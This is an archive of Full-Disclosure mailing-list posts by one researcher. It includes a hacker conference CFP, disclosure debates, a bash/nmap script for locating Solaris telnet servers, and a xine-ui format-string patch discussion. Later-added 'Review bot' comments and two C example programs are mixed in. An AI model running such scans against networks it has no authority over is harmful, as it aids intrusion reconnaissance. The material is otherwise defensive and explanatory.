[Full-disclosure] Hackito Ergo Sum 2010 - Call For Paper - HES2010 CFP

2010-02-03 Thread endrazine
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Hackito Ergo Sum 2010 - Call For Paper - HES2010 CFP
http://hackitoergosum.org

Hackito Ergo Sum conference will be held from April 8th to 10th 2010 in
Paris, France.
It is part of the Hacker Space Fest series of conferences, taking place
since 2008 in France and all over Europe.

HES2010 will focus on hardcore computer security, insecurity,
vulnerability analysis, reverse engineering, research and hacking.

INTRO
The goal of this conference is to promote security research, broaden
public awareness and create an open forum so that communication between
researchers, the security industry, experts and the public can
happen.

A recent court decision in France has convicted a security
researcher for disclosing vulnerabilities and exploits. These laws
(similar to the one in Germany), descending from the USA's DMCA law, are
pushing freedom of research and knowledge into a situation where
illegal knowledge can exist, restricted only to those blessed by
silent governmental approval and the military. Scientific research and
public information cannot be made into another state monopoly, where
some can study and publish and others cannot.
Such an approach just shows how misinformed some politicians are and how
little they understand of the struggle they are acting in.

Not understanding that the best way to improve security is to attack it
shows the lack of maturity of some stakeholders who are cut off from
independent information sources.
This is where our ethics and responsibility are to say No: we have a
right to free information and true independence in research, and this
responsibility is everybody's, not just that of
academically blessed scientists.

This conference will try to take into account all voices in order to reach
a balanced position regarding research and security, inviting
businesses, governmental actors, researchers, professionals and the general
public to share concerns, approaches and interests.
During three days, research conferences, solution presentations, panels
and debates will aim at finding synthetic and balanced solutions to the
current situation.


CONTENT

 Research Track:
We are expecting submissions in English or French, English preferred.
The format will be a 45 mn presentation + 10 mn Q&A.

For the research track, preference will be given for offensive,
innovative and highly technical proposals covering (but not restricted
to) the topics below:

Attacking Software
* Vulnerability discovery (and automating it!)
* Non-x86 exploitation
* Fuzzing with SMT and its limits
* New classes of software vulnerabilities and new methods to detect
software bugs (source or binary based)
* Reverse Engineering tools and techniques
* Static analysis (source or binary, Lattices to blind analysis, new
languages and targets strongly encouraged)
* Unpacking
* Current exploitation on Gnu/Linux WITH GRsecurity / SElinux / OpenWall
/ SSP and other current protection methods
* Kernel land exploits (new architectures or remote only)
* New advances in Attack frameworks and automation

Attacking Infrastructures
* Exotic Network Attacks
* Telecom (from VoIP to SS7 to GSM & 3G RF hacks)
* Financial and Banking institutions
* SCADA and the industrial world, applied.
* Governmental firewalls and their limits (Australia, France's HADOPI,
China, Iran, Denmark, Germany, ...)
* Satellites, Military, Intelligence data collection backbones (I
hacked Echelon and I would like to share)
* Non-IP (SNA, ISO, make us dream...)
* Red-light and other public utilities control networks
* M2M

Attacking Hardware
* Hardware reverse engineering (and exploitation + backdooring)
* Femto-cell hacking (3G, LTE, ...)
* Microchip grinding, opening, imaging and reverse engineering
* BIOS and otherwise low-level exploitation vectors
* Real-world SMM usage! We know it's vulnerable, now let's do something
* WiFi drivers and System on Chip (SoC) overflow, exploitation and
backdooring.
* Gnu Radio hacking applied to new domains
* Toll-booth and fast-lane payment systems

Attacking Crypto
* Practical crypto attacks from the hackers' perspective (RCE,
bruteforce, ...)
* SAT-solver applied to cryptanalysis
* Algorithm strength modeling and evaluation metrics
* Hashing functions pre-image attacks
* Crypto where you wouldn't think there is

We highly encourage any other presentation topic that we may not even
imagine.

Required information:
* Presenter's name
* Bio
* Presentation Title
* Description
* Demo?
* Needs: Internet? Others?
* Company (name) or Independent?
* Address
* Phone
* Email

Send your submission to:
hes2010-cfp __AT__ lists.hackitoergosum.org


 Business & Society Track:
Format:
20 minutes slots to present a tool, an innovative product, a solution
(commercial, open source, free); a customer experience or open research
domain; a society issue or a subject of public interest.

Demos are mandatory for tool, product or solutions presentations.
Pure-marketing 

Re: [Full-disclosure] The real motivations of vulnerability disclosure

2007-10-03 Thread endrazine
Hello FD readers,

I don't usually answer non-technical posts, but I feel like explaining why I
believe the ideas expressed by Mr Frog and similar underground orthodoxes
are clueless.

Mr Frog: to summarize your thesis: ppl disclose vulnerabilities for fame
& profit. That's not how real hackers used to be.

Ok, let's analyze those statements a bit deeper:

First, let's establish the truth about fame:
Fame? What fame? Does your mother know who Michal Zalewski is? Of course
not. When you first decided to be a computer enthusiast, you also decided
you would spend your life behind a computer and no one would ever give a damn.

You're also mentioning people having Wikipedia entries or belonging to
crews (the so-called "research communities"): you're surely missing people
writing bullshit on blogs and posting links to their miserable thoughts on
public mailing lists...

Additionally, I especially enjoy the intellectually challenging relation
between your first sentence, "when a vulnerability in a major site is
discovered people freak out...", and your conclusion: "These types of people
tend to hang around 'xss' hacking sites where they can learn the masterful
art of finding an issue any 5 year old could find with less than 15 minutes
of training."

In a nutshell, that's the good old Manichean (did I say Protestant?) schema:
the good (being the non-disclosure folks from your blog post) against the
bad (being the fame seekers) guys. In the same vein, let me quote
http://www.phrack.org/issues.html?issue=64&id=4#article :

But it is the reason not to write a technical article. The purpose of
this article is to launch an SOS. An SOS to the scene, to everyone, to all
the hackers in the world. To make all the next releases of Phrack better
than ever before. And for this I don't need a technical article. I need
what I would call Spirit.

(follows an apology of pre-internet hacking mythology)

Those kinds of thoughts are almost as inept as they are widespread.

To you all, anachronistic purists of the so-called underground: go to hell. If
there ever was a spirit of the underground, it was the belief that
individuals can, on their very own, do better than what engineers do in the
industry (which is in fact absolutely understandable if you consider that
companies have budget constraints, deadlines and limited knowledge). I don't
see any opposition between this and vulnerability disclosure. What you do
with a vulnerability you have found is irrelevant. Now, if the whole dilemma
is about people being at the same time security enthusiasts on their own,
and social beings needing to work in a way or another to feed their
families, let me tell you a big secret: everyone in the underground,
starting with Adm, teso, phenoelite, phrack, (pasting from phrack's
article) 2600, Phrack, PacketStorm, Phreak.org, Uninformed,
PTP, Netric, Felinemenace, Hackcanada, Toxyn, phc, w00w00, devhell, cDc, l0pht,
el8, gobbles, synergy, blacksecurity, u-name-it people and members of every
other reasonably skilled security group I have never heard of are working
for security related companies. Maybe it wasn't the case in the 80's. But
today, if you want to be able to understand a bit what's going on, hacking
is a full time job. There is no dichotomy between hacking on your own and
selling your skills to a company. So please, stop pointing the finger at
each person trying to share a bit of what they have discovered.

my 0.02$

Regards,

--
endrazine-//Garage made hacker  Security Engineer at the same time.


PS: The members of the above cited groups are asked not to flame me with
"I'm no industry guy" posts: I know you are ;) And thanks for sharing your
work: I couldn't get half of the skills I have today without your
disclosures.



On 10/3/07, Mr Frog [EMAIL PROTECTED] wrote:

 For the past 10 years when a vulnerability in a major site is discovered
 people freak out. I'm not debating the importance of certain site
 vulnerabilities such as those exposing personal or account information. I'm
 going to talk about one of those things people think, but don't speak
 publicly about which involves the intentions of those vulnerability
 disclosure folks. I'm going to break down these types of people and some
 people in the 'industry' are going to laugh and others possibly be offended.
 If you have a problem with this then we can meet in an alley for warfare,
 but please don't bring salt as it burns.

 http://hackingfrog.blogspot.com/2007/10/o-o-omg-frog.html

 - Froggie

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] firefox 2.0.0.2 crash

2007-03-11 Thread endrazine
Mihai Dontu wrote:
 On Friday 09 March 2007 20:31, Tõnu Samuel wrote:
   
 Can be dupe but in fast browsing over topics I did not discover this
 exploit:

 http://people.zoy.org/~sam/firefox-crash-save-session-before-clicking.gif
 

Makes gimp 2.2.12 segfault.

[EMAIL PROTECTED] ~/firefox.crash $ gimp ./firefox-crash-save-session-before-clicking.gif
GIF: too much input data, ignoring extra...
GIF: bogus character 0x00, ignoring.
GIF: too much input data, ignoring extra...
GIF: bogus character 0x00, ignoring.
GIF: bogus character 0x23, ignoring.
GIF: bogus character 0xf9, ignoring.
GIF: bogus character 0x04, ignoring.
GIF: bogus character 0x05, ignoring.
GIF: bogus character 0x0a, ignoring.
GIF: bogus character 0x00, ignoring.
GIF: bogus character 0x0e, ignoring.
GIF: bogus character 0x00, ignoring.

(gifload:8687): LibGimp-CRITICAL **: gimp_drawable_get: assertion `width > 0 && height > 0 && bpp > 0' failed
/usr/lib/gimp/2.0/plug-ins/gifload: fatal error: Erreur de segmentation
[EMAIL PROTECTED] ~/firefox.crash $


Cheers,

endrazine




Re: [Full-disclosure] Solaris telnet vulnberability - how many on yournetwork?

2007-02-17 Thread endrazine
Hi,

you don't want to ask nmap to determine the OS based on a port 23 scan only,
so s/p23// in the second nmap call.
hence:

#!/bin/bash

# solaris-telnetd-audit.sh
# For every host in ips.lst: check whether TCP/23 is open, then run nmap's
# service/version detection against the whole host (not port 23 alone) and
# report the hosts whose banners identify SunOS/Solaris.
# (-P0 is the old spelling of "skip host discovery"; newer nmap calls it -Pn.)

IPSFILE=./ips.lst; # file containing IPs to scan
MESSAGE="possible-Solaris-telnet-server-found";
EMAIL="[EMAIL PROTECTED]";

for IP in `cat "$IPSFILE"`
do
    echo "Trying $IP ...";
    if nmap -P0 -n -p23 -sS "$IP" | grep -i open > /dev/null
    then
        # no -p23 here: let -sV look at every open port before deciding
        if nmap -P0 -n -sV "$IP" | grep -ie 'SunOS' -ie 'Solaris' > /dev/null
        then
            echo "$MESSAGE - $IP"; echo "$IP" >> "$0.results";
        fi
    fi
done

# one mail with every hit, instead of one mail per host
cat "$0.results" | mail -s "$MESSAGE" "$EMAIL"



my 0.02$

Cheers,

endrazine-




pagvac wrote:
 On 2/17/07, Marcin Antkiewicz [EMAIL PROTECTED] wrote:
   
 On Sat, 17 Feb 2007, pagvac wrote:
 
 The following script might also help find Solaris telnet servers on
 your network.
   
 [...]

 
 for IP in `cat $IPSFILE`
 do
    echo "Trying $IP ...";
    if nmap -P0 -n -p23 -sS $IP | grep -i open > /dev/null
    then
        if nmap -P0 -n -p23 -sV $IP | grep -ie 'SunOS' -ie 'Solaris'
        then
            echo "$MESSAGE on $IP"; echo $IP >> $0.results; echo $IP | mail -s "$MESSAGE" $EMAIL
        fi
    fi
 done
   
 The output would be too noisy on a large network. Few weeks ago I ran
 

 Noisy only on the screen/email output. However, notice that *only* the
 IP addresses found running Solaris telnet servers are written to the
 results file ($0.results).

 Perhaps we should change it to the following so that only one email is
 sent with all the IP addresses found:

 #!/bin/bash

 # solaris-telnetd-audit.sh

 IPSFILE=./ips.lst; # file containing IPs to scan
 MESSAGE="possible-Solaris-telnet-server-found";
 EMAIL="[EMAIL PROTECTED]";

 for IP in `cat $IPSFILE`
 do
 echo "Trying $IP ...";
 if nmap -P0 -n -p23 -sS $IP | grep -i open > /dev/null
 then
 if nmap -P0 -n -p23 -sV $IP | grep -ie 'SunOS' -ie
 'Solaris' > /dev/null
 then
 echo "$MESSAGE - $IP"; echo $IP >> $0.results;
 fi
 fi
 done

 cat $0.results | mail -s "$MESSAGE" $EMAIL


 P.S.: I personally like using genip
 [http://www.bindshell.net/tools/genip] for generating lists of IP
 addresses.

   
 something that would go like this:


( echo "Sun boxes with telnet"; \
  nmap -n -P0 -iL list -p 23 -O -oG - |\
  grep -Ei 'Host.+open.+(Solaris|SunOS)' | \
  cut -d ' ' -f 2 \
) | mail -s "Check those" [EMAIL PROTECTED]


 --
 Marcin Antkiewicz


 


   

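An added example, not code from this thread: Marcin's host filter (`grep -Ei 'Host.+open.+(Solaris|SunOS)'` over `nmap -oG -` output) rewritten as a small parser, so the check becomes "TCP port 23 is open on this host AND the OS guess names Solaris or SunOS" rather than "the words open and Solaris appear somewhere on the line". It assumes the tab-separated `Host:` / `Ports:` / `OS:` field layout of nmap's greppable format; the `gnmap_*` function names are this example's own, and the sample lines are constructed, not real scan output.

```c
/* Added example (not from the thread): parse nmap greppable (-oG) lines and
 * flag hosts with TCP/23 open whose OS guess is Solaris/SunOS. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed -oG lines (not real scan output). Only the first and the last
 * should be flagged: .6 has 23 closed, .7 has 2301 (not 23) open, .8 is Linux. */
static const char *const SAMPLE[] = {
    "Host: 10.0.0.5 ()\tPorts: 23/open/tcp//telnet///\tOS: Sun Solaris 9 (SPARC)",
    "Host: 10.0.0.6 ()\tPorts: 22/open/tcp//ssh///, 23/closed/tcp//telnet///\tOS: Sun Solaris 10",
    "Host: 10.0.0.7 ()\tPorts: 2301/open/tcp//compaqdiag///\tOS: SunOS 5.8",
    "Host: 10.0.0.8 ()\tPorts: 23/open/tcp//telnet///\tOS: Linux 2.6.X",
    "Host: 10.0.0.9 (solaris-lab)\tPorts: 23/open/tcp//telnet///\tOS: SunOS 5.9",
};
#define NSAMPLE (sizeof SAMPLE / sizeof SAMPLE[0])

/* Case-insensitive substring search limited to `len` bytes of hay
 * (strcasestr is not standard C). */
static int contains_nocase(const char *hay, size_t len, const char *needle)
{
    size_t n = strlen(needle), i, j;
    for (i = 0; i + n <= len; i++) {
        for (j = 0; j < n; j++)
            if (tolower((unsigned char)hay[i + j]) != tolower((unsigned char)needle[j]))
                break;
        if (j == n)
            return 1;
    }
    return 0;
}

/* A -oG field ends at the next tab or at end of line. */
static size_t field_len(const char *p)
{
    const char *tab = strchr(p, '\t');
    return tab ? (size_t)(tab - p) : strlen(p);
}

/* Does the Ports: field list TCP `port` as open? Entries look like
 * "23/open/tcp//telnet///" and are separated by ", ". Comparing at the start
 * of each entry means 2301/open or 123/open cannot pass for 23/open. */
int gnmap_port_open(const char *line, int port)
{
    const char *p = strstr(line, "Ports: ");
    char want[32];
    size_t wl;
    if (!p)
        return 0;
    p += strlen("Ports: ");
    wl = (size_t)snprintf(want, sizeof want, "%d/open/tcp", port);
    while (*p && *p != '\t') {
        if (strncmp(p, want, wl) == 0)
            return 1;
        while (*p && *p != '\t' && !(p[0] == ',' && p[1] == ' '))
            p++;                     /* skip to the next entry */
        if (*p == ',')
            p += 2;
    }
    return 0;
}

/* Does the OS: field (that field only, so a reverse-DNS name such as
 * "solaris-lab" cannot trigger it) name Solaris or SunOS? */
int gnmap_os_is_sun(const char *line)
{
    const char *os = strstr(line, "OS: ");
    size_t len;
    if (!os)
        return 0;
    os += strlen("OS: ");
    len = field_len(os);
    return contains_nocase(os, len, "solaris") || contains_nocase(os, len, "sunos");
}

/* Copy the address out of "Host: 10.0.0.5 (name)"; returns 0 if absent. */
int gnmap_host(const char *line, char *out, size_t outsz)
{
    const char *p = strstr(line, "Host: ");
    size_t i = 0;
    if (!p || outsz == 0)
        return 0;
    p += strlen("Host: ");
    while (*p && *p != ' ' && *p != '\t' && i + 1 < outsz)
        out[i++] = *p++;
    out[i] = '\0';
    return i > 0;
}

int is_solaris_telnet_host(const char *line)
{
    return gnmap_port_open(line, 23) && gnmap_os_is_sun(line);
}

/* Run the filter over the constructed sample; returns the number of hits. */
int count_sample_hits(void)
{
    int hits = 0;
    size_t i;
    char addr[64];
    for (i = 0; i < NSAMPLE; i++)
        if (is_solaris_telnet_host(SAMPLE[i]) && gnmap_host(SAMPLE[i], addr, sizeof addr)) {
            printf("%s\n", addr);
            hits++;
        }
    return hits;
}

int main(void)
{
    /* Real use would read stdin line by line from
     *   nmap -n -P0 -iL ips.lst -p 23 -O -oG -
     * instead of SAMPLE. */
    printf("%d host(s) flagged\n", count_sample_hits());
    return 0;
}
```

On the sample, the bare regex from the one-liner would also match the .6 and .7 lines (they contain "open" and a Sun OS string) and mail two hosts that have no telnet service at all; the parser flags only .5 and .9.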


[Full-disclosure] [Fwd: Re: [ GLSA 200701-18 ] xine-ui: Format string vulnerabilities]

2007-01-26 Thread endrazine

Hi list,

I couldn't get a confirmation from the author of this post.
GLSAs are very often the best source of detailed information
on a given vulnerability imho; at least, they provide indications
on the type of vulnerability and the affected function name.

Too bad they're inaccurate :/

Regards,

endrazine-


---BeginMessage---

Hello Raphael,

I have an issue with this GLSA (which is a really useful service
by the way, thanks):


I think the affected syscall is xitk_window_dialog_error rather, at lines
128, 231, 357 in /src/xitk/errors.c;
the bad thing is that errors_create_window exists but wasn't modified
at all...


see below...




$ diff ./xine-ui-0.99.4/src/xitk/errors.c 
../../xine-ui-0.99.5_pre20060716/work/xine-ui-0.99.5_pre20060716/src/xitk/errors.c

20c20
  * $Id: errors.c,v 1.32 2005/02/07 18:16:28 miguelfreitas Exp $
---
  * $Id: errors.c,v 1.34 2006/07/15 08:46:50 dgp85 Exp $
71c71
message);
---
%s, message);
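Review bot: the fix at line 71 puts a fixed `%s` format in front of `message`, so the string is consumed as an argument instead of being parsed for conversion directives, which is the right remedy; but the hunk shows only the closing argument list, so the commit message or advisory should name the enclosing call, otherwise a reader cannot tell which dialog function was reachable with untrusted text.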
113c113
   if(gGui-stdctl_enable) {
---
   if(gGui-stdctl_enable || !gGui-display) {
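Review bot: the added `|| !gGui-display` condition at line 113 changes when the stdctl path is taken and has nothing to do with the format string fix the rest of this diff makes; it should be a separate change, or the advisory should say why a behavioural change ships together with the security fix.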
128c128
   xw = xitk_window_dialog_error(gGui-imlib_data, buf2);
---
   xw = xitk_window_dialog_error(gGui-imlib_data, %s, buf2);
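Review bot: line 128 shows the bug shape directly: `buf2`, the message being displayed, was passed where `xitk_window_dialog_error` takes a format, so any `%` sequence in it would be interpreted, and the `%s, buf2` form closes that. Since this is a call into `xitk_window_dialog_error` rather than an edit inside `errors_create_window`, the advisory's statement that `errors_create_window()` is the function that "does not safely write data to memory" does not match what the diff touches, as endrazine points out above; the description should name the printf-style helper instead.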
231c231
   xw = xitk_window_dialog_info(gGui-imlib_data, buf2);
---
   xw = xitk_window_dialog_info(gGui-imlib_data, %s, buf2);
357c357
message);
---
%s, message);
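Review bot: lines 231 and 357 repeat the same `%s` insertion as lines 71 and 128, which suggests the pattern was copied between call sites; an audit of every caller of the `xitk_window_dialog_*` helpers (and any other printf-style function in this file) should confirm no remaining call passes a message as the format, otherwise the same bug class survives this fix.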




Regards,


endrazine-





Raphael Marichez wrote:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200701-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: xine-ui: Format string vulnerabilities
  Date: January 23, 2007
  Bugs: #161558
ID: 200701-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


xine-ui improperly handles format strings, possibly allowing for the
execution of arbitrary code.

Background
==

xine-ui is a skin-based user interface for xine. xine is a free
multimedia player. It plays CDs, DVDs, and VCDs, and can also decode
other common multimedia formats.

Affected packages
=

    -------------------------------------------------------------------
     Package  /   Vulnerable   /                          Unaffected
    -------------------------------------------------------------------
  1  xine-ui     < 0.99.5_pre20060716            >= 0.99.5_pre20060716

Description
===

Due to the improper handling and use of format strings, the
errors_create_window() function in errors.c does not safely write data
to memory.

Impact
==

An attacker could entice a user to open a specially crafted media file
with xine-ui, and possibly execute arbitrary code.

Workaround
==

There is no known workaround at this time.

Resolution
==

All xine-ui users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-video/xine-ui-0.99.5_pre20060716"

References
==

  [ 1 ] CVE-2007-0254
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0254

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200701-18.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
  






---End Message---
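An added example, not xine-ui code: the two call shapes from the diff above, a message passed as the format versus `"%s", message`, on a small printf-style helper. The `dialog_printf` and `render_*` names are hypothetical stand-ins for the `xitk_window_dialog_*` calls, and the message text is constructed. Only `%%` is used on the vulnerable path, because it is the one directive that is well defined without arguments; with `%s`, `%x` or `%n` in the message that path is undefined behaviour, which is the advisory's point.

```c
/* Added example (not xine-ui code): message-as-format versus "%s", message. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

static char g_out[128];   /* stands in for the dialog window's text */

/* A printf-style dialog helper of the kind UI toolkits expose. It renders
 * into g_out instead of a window so the result can be compared. */
static void dialog_printf(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(g_out, sizeof g_out, fmt, ap);
    va_end(ap);
}

/* "Before": the message, which may come straight from a media file, is
 * handed over as the format, so every '%' in it is parsed as a directive. */
const char *render_before(const char *message)
{
    dialog_printf(message);          /* format string bug */
    return g_out;
}

/* "After": a fixed literal format; the message can only ever be an
 * argument and is copied verbatim whatever it contains. */
const char *render_after(const char *message)
{
    dialog_printf("%s", message);
    return g_out;
}

/* Count conversion directives in a string. "%%" is an escaped percent sign,
 * not a directive. A non-zero count on data that can reach a format
 * argument is what a code audit for this bug class looks for. */
int count_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {
            s++;                     /* skip the escaped pair */
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    const char *msg = "disk 100%% full";   /* constructed message */
    printf("before: %s\n", render_before(msg));   /* disk 100% full  */
    printf("after:  %s\n", render_after(msg));    /* disk 100%% full */
    printf("directives in \"%%s %%08x %%n\": %d\n",
           count_directives("%s %08x %n"));       /* 3 */
    return 0;
}
```

The "before" path silently rewrites the text even in the harmless `%%` case; that rewrite is the same parsing that, with `%n`, turns a display call into a write. Giving `dialog_printf` GCC's `__attribute__((format(printf, 1, 2)))` and building with `-Wformat -Wformat-security` makes the compiler flag the `render_before` call ("format not a string literal and no format arguments"), which is the cheapest way to find every such call site in a code base like xitk.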

Re: [Full-disclosure] [Fwd: Re: [ GLSA 200701-18 ] xine-ui: Format string vulnerabilities]

2007-01-26 Thread endrazine
Hello,

Ok, apparently, the primary source of information is the CERT, since:
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0254

hrm, I still think the vulnerability has nothing to do with
errors_create_window though.

Cheers,

endrazine-

endrazine wrote:
 Hi list,

 I couldn't get a confirmation from the author of this post.
 GLSAs are very often the best source of detailed information
 on a given vulnerability imho; at least, they provide indications
 on the type of vulnerability and the affected function name.

 Too bad they're inaccurate :/

 Regards,

 endrazine-



 

 Subject:
 Re: [Full-disclosure] [ GLSA 200701-18 ] xine-ui: Format string
 vulnerabilities
 From:
 endrazine [EMAIL PROTECTED]
 Date:
 Wed, 24 Jan 2007 08:08:51 +0100
 To:
 Raphael Marichez [EMAIL PROTECTED]


 Hello Raphael,

 I have an issue with this GLSA (which is a really useful service
 by the way, thanks):

 I think the affected syscall is xitk_window_dialog_error rather, at
 lines 128, 231, 357 in /src/xitk/errors.c;
 the bad thing is that errors_create_window exists but wasn't
 modified at all...

 see below...




 $ diff ./xine-ui-0.99.4/src/xitk/errors.c 
 ../../xine-ui-0.99.5_pre20060716/work/xine-ui-0.99.5_pre20060716/src/xitk/errors.c
  

 20c20
   * $Id: errors.c,v 1.32 2005/02/07 18:16:28 miguelfreitas Exp $
 ---
   * $Id: errors.c,v 1.34 2006/07/15 08:46:50 dgp85 Exp $
 71c71
 message);
 ---
 %s, message);
 113c113
if(gGui-stdctl_enable) {
 ---
if(gGui-stdctl_enable || !gGui-display) {
 128c128
xw = xitk_window_dialog_error(gGui-imlib_data, buf2);
 ---
xw = xitk_window_dialog_error(gGui-imlib_data, %s, buf2);
 231c231
xw = xitk_window_dialog_info(gGui-imlib_data, buf2);
 ---
xw = xitk_window_dialog_info(gGui-imlib_data, %s, buf2);
 357c357
 message);
 ---
 %s, message);




 Regards,


 endrazine-






Re: [Full-disclosure] Wikipedia and Pedophilia

2007-01-24 Thread endrazine
Could you please please move to alt.politics.personal.statements.on.drugs ?



Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure

2007-01-08 Thread endrazine
Hi Vladis, Hi dear list,

[EMAIL PROTECTED] wrote:

 It's a pretty easy proof actually.  If your password input routine allows
 more different passwords than there are possible hashes, you *will* have
 collisions.  For instance, if you use a 64-bit hash, and reasonable-length
 passwords, you can create more than 2**64 of them, and 2 *have* to collide.

   
Agreed,  good sense helps in some cases ;)

 If you're using anything resembling a sane hash (such as MD5 or similar),
 what happens is that you basically ignore the hash collisions - because
 rather than 1234, your colliding password/phrase is probably a 32-byte or so
 string, which is likely not even enterable at the keyboard (it ends up being
 A # ctl-b 9 e alt-control-meta-$ etcetc - of the 32, likely only 10 or so
 of the characters are from the 96-char printable ASCII set, and there's a good
 chance that at least several of the bytes are ones you can't enter from the
 keyboard at all)
   
Here again, I agree. Now, if one needs to exhaustively try every
possible 32b hash with the largest possible charset (or even bigger hashes
with a smaller one, like those alphanumerical keys you just mentioned), to
break a password hash, then it's not a *BIG* security issue like
mentioned earlier imho.

Cheers,

endrazine-



Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure

2007-01-08 Thread endrazine
typos :

endrazine wrote:
 Here again, I agree. Now, if one needs to exhaustively try every
 possible 32b hash with the largest possible charset (or even bigger hashes
 with a smaller one, like those alphanumerical keys you just mentioned), to
 break a password hash, then it's not a *BIG* security issue like
 mentioned earlier imho.
   
s/hashes/passwords/ indeed

Cheers,

endrazine-



Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure

2007-01-07 Thread endrazine
Hi dear list,

wac wrote:


 On 1/5/07, [EMAIL PROTECTED] wrote:

 On Fri, 05 Jan 2007 15:34:49 EST, T Biehn said:
  This isn't a password disclosure, it's a leak of password
 information.
 
  It's a password hash, you super hacker.



 yes that's correct but don't forget that hashes can collide

 it could be the case that:

can? could? might? Do you have any mathematical proof or are you
just guessing?

 xhash($Up3$tr0n9 # [EMAIL PROTECTED]) == xhash(1234) and you don't even 
 need the original strong one ;)

what hashing algorithm is being used? Is a collision realistic? How
much time would it take to actually break a given hash?
 so strong password is not a countermeasure to that

 I believe that is a BIG security hole

At least, the hash was probably not meant to be leaked ;)
Now, if you don't answer the above questions by "can", "weak", "very",
"< 1 day" or so, then the word BIG is a bit exaggerated imho...

Regards,

endrazine-



Re: [Full-disclosure] CCC: Monochrom, hackers and art (plus other videos and presentations)

2007-01-04 Thread endrazine
Hi dear list,

<usual politeness>
Happy new year, etc... ;)
</usual politeness>

I have apparently not attended any talk (besides those on RFID) Gadi did...

Technically speaking, the best talks I have seen (security wise) were :

* Unusual bugs by Ilja :
http://events.ccc.de/congress/2006/Fahrplan/events/1456.en.html

* An amazing one man show by Dan Kaminsky ;) :
http://events.ccc.de/congress/2006/Fahrplan/events/1713.en.html

* the 3 RFID hacking talks on day 2 :
http://events.ccc.de/congress/2006/Fahrplan/day_2.en.html
The talk by Melanie Rieback was very instructive in spite of some
very questionable commercial propaganda (imho).

Joanna's talk was also refreshing for non technical reasons ;p


Regards,

endrazine-


PS: Tonnerre's lecture was also interesting for anyone involved with 
open source development.
PPS: Thx to ppl who spent time socializing a bit, I had a great time 
sharing ideas with you :)



Gadi Evron wrote:
 CCC was amazing! I am definitely going next year again. For more videos
 and presentations suggestions, skip to the link below.

 One of the greatest surprises for me at 23C3 was my personal introduction
 to Monochrom ( http://monochrom.at/ ,
 http://en.wikipedia.org/wiki/Monochrom ), a group of hacker artists from
 Austria. I know Jake Applebaum.. but I had no idea about the Austrian
 group, or how great they are.

 In very simple terms they are artists, very contemporary and very very
 scene-connected. Life hacking, real hacking and any type of hacking, these
 guys are just l33t. We need to get them a stage one evening at defcon so
 they can play for us.
 As a quick introduction to them, sing along with their RFID song (special
 for 23C3). I know I did. (although I couldn't follow their German songs,
 Danke sounded like a lot of fun - yes, I saw you singing Fukami!)
 http://youtube.com/watch?v=Ywg53D8_iVw

 For their lecture at 23C3, which is very cool and presents a lot of very
 interesting art projects heavily relating to hacking (not work
 safe! Porn! Could be considered very offensive! PG18, etc.) download the
 wmv:

 ftp://ftp.c3d2.de/congress/23c3/monochrom-t4s3.wmv

 Some of the projects they discuss include porn, indeed, but others are
 more interesting. They created an entirely fictional artist (Georg Paul
 Thomann - http://en.wikipedia.org/wiki/Georg_Paul_Thomann ) and had him
 represent Austria in an International art show (and save Taiwan when
 China wanted them out of the show). They showed (both by using 50 real
 Euros and with a mathematical calculation) how many times it would take
 to blow the several Trillian Euros in circulation by going to a bank and
 exchanging to USD and Euro again and again, etc.

 Cool people! RFID!!

 I cover CCC extensively on the SecuriTeam blogs, if anyone is interested
 in other talks of note:
 CCC report: day 0
 http://blogs.securiteam.com/index.php/archives/773

 23C3 (CCC) lectures on Google Video
 http://blogs.securiteam.com/index.php/archives/777

 More CCC Presentations and Videos
 http://blogs.securiteam.com/index.php/archives/779

 CCC: Router and Infrastructure Hacking
 http://blogs.securiteam.com/index.php/archives/781

 CCC: traffic analysis
 http://blogs.securiteam.com/index.php/archives/782

 CCC: Monochrom, hackers and art
 http://blogs.securiteam.com/index.php/archives/783

   Gadi.


   



Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread endrazine
Heya list & 3APA3A,

3APA3A wrote:
 Dear full-disclosure@lists.grok.org.uk,

 There  is  interesting  thing  with  event  logging on Windows. The only
 security  aspect  of  it  is  event log record tampering and performance
 degradation,  but  it may become sensitive is some 3rd party software is
 used for automated event log analysis.

 The   problem   is   a  kind  of  Format  string  vulnerability  where
 user-supplied  input  is  used  for  event log record. For ReportEvent()
 function  %1,  %2,  etc  have  a  special  meaning and are replaced with
 corresponding  string  from  lpStrings.  
It looks more like a variable replacement (like $0 $1 ... in bash shell) 
than a format string issue to me.
And it seems indeed to be a relevant information disclosure bug.


Cheers,

endrazine-



Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

2006-12-05 Thread endrazine
Tyop? wrote:
 Flashing the bios will erase all data.
 It's a feature, not a bug.

   
